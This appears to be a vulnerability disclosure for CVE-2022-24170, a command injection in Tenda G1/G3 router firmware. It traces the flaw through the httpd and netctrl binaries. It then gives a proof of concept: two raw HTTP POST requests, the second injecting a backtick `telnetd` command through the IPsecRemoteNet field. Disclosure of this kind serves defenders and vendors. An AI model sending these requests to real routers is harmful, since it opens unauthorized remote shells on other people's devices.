CVE-2022-24170: my_vuln/36.md at main · pjqwudi/my_vuln

Tenda Vulnerability

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In httpd binary:

In formSetIpSecTunnel function, IPsecLocalNet、IPsecRemoteNet is directly passed by the attacker, so we can control the IPsecLocalNet、IPsecRemoteNet to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the setIpSecTunnelSettings function. We mainly explain the data flow of this part.

Here, enter the function getIpSecTunnelSettings for the next data flow tracking.

The part that gets the user input is in the function getIpSecTunnelSettings.

As you can see here, in setIpSecTunnelSettings function, the input has not been checked. And then, call the function prod_cfm_set_val to store this input.

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.

The necessary condition for successfully triggering the vulnerability is to enable the l2tp service, so we need to send two packets to complete the triggering of the vulnerability

In netctrl binary:

In vpn_ipsec_init_param function, the initial input will be extracted.

Eventually, in vpn_ipsec_enable function, the initial input will cause command injection.

There are many trigger points in the program execution process, only one place is shown here.

Supplement

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

• Enable l2tp service
• Set ipsectunel

PoC

Enable l2tp service.

POST /goform/setVpnServer HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/vpn/pptpServer.html?0.9176754136302114 Cookie: _:USERNAME:_=; G3v3_user=

vpnServerEn=true&vpnServerType=l2tp&vpnServerWAN=WAN1&l2tpServerEncrypt=disable

We set IPsecRemoteNet as telnetd , and the router will excute it,such as:

POST /goform/setIPsecTunnel HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 590 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/vpn/ipsec.html?0.40102392250425467 Cookie: _:USERNAME:_=; G3v3_user=

IPsecTunnelIndex=0&IPsecEn=true&IPsecWrapMode=tunnel&IPsecWAN=WAN1&IPsecConnectName=pjqwudi&IPsecDealMode=1&IPsecTunnelProtocol=ESP&IPsecGateway=www.baidu.com&IPsecLocalNet=192.168.1.0%2F24&IPsecRemoteNet=`telnetd`&IPsecNegotiation=auto&IPsecSecurity=psk&IPsecSharePwd=123123123&IPsecDPDEn=true&IPsecDPDTime=1&IPsecMode=main&IPsecEncrypt1=3DES&IPsecVerify1=SHA1&IPsecDH1=768&IPsecRemoteIdentifierEn=false&IPsecRemoteIdentifier=&IPsecLocalIdentifierEn=false&IPsecLocalIdentifier=&IPsecPwdValidity1=3600&IPsecPFSEn=true&IPsecEncrypt2=3DES&IPsecVerify2=SHA1&IPsecDH2=768&IPsecPwdValidity2=3600

Result

The target router has enabled the telnet service.